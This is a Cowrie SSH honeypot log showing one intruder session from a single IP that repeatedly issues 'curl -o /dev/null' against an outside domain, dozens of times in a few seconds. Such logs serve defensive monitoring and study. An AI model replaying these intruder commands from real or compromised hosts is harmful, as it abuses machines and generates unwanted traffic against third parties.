{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.755945Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.794281Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.795221Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.832501Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.833939Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.881747Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.882681Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.921536Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.922412Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:30.972123Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:30.973288Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.010849Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.011783Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.049418Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.050355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.086903Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.088376Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.125171Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.125854Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.162268Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.163174Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.199710Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.200842Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.241375Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.242283Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.290591Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.291524Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.328281Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.329870Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.411044Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.411961Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.450243Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.451124Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.493511Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.494688Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.531297Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.532150Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.569110Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.570025Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.609035Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.610355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.654631Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.655596Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.696584Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.697501Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.745341Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.746695Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.785203Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.786033Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.823322Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.824320Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.861336Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.862534Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.899517Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.900462Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:31.947005Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:31.947998Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.027979Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.029024Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.065618Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.066551Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.106261Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.106960Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.145429Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.146303Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.197177Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.198087Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.246802Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.247719Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.287526Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.288420Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.325015Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.325886Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.363151Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.364321Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.401465Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.402305Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.438578Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.439429Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.478241Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.479093Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.533511Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.534368Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.573682Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.574560Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.668158Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.669021Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.707467Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.708401Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.747644Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.748809Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.788006Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.788972Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.826219Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.827111Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.864228Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.865132Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.902548Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.903446Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.942312Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.943284Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:32.980070Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:32.980935Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.025997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.026932Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.074453Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.075370Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.112202Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.113098Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.154047Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.154931Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.191929Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.192843Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.234128Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.234997Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.271524Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.272359Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.309355Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.310254Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.348288Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.349251Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.388993Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.389878Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.427814Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.428766Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.475492Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.476408Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.512889Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:41:33.513771Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:41:33.550804Z","src_ip":"212.227.125.160","session":"7b47a9222cbe"}
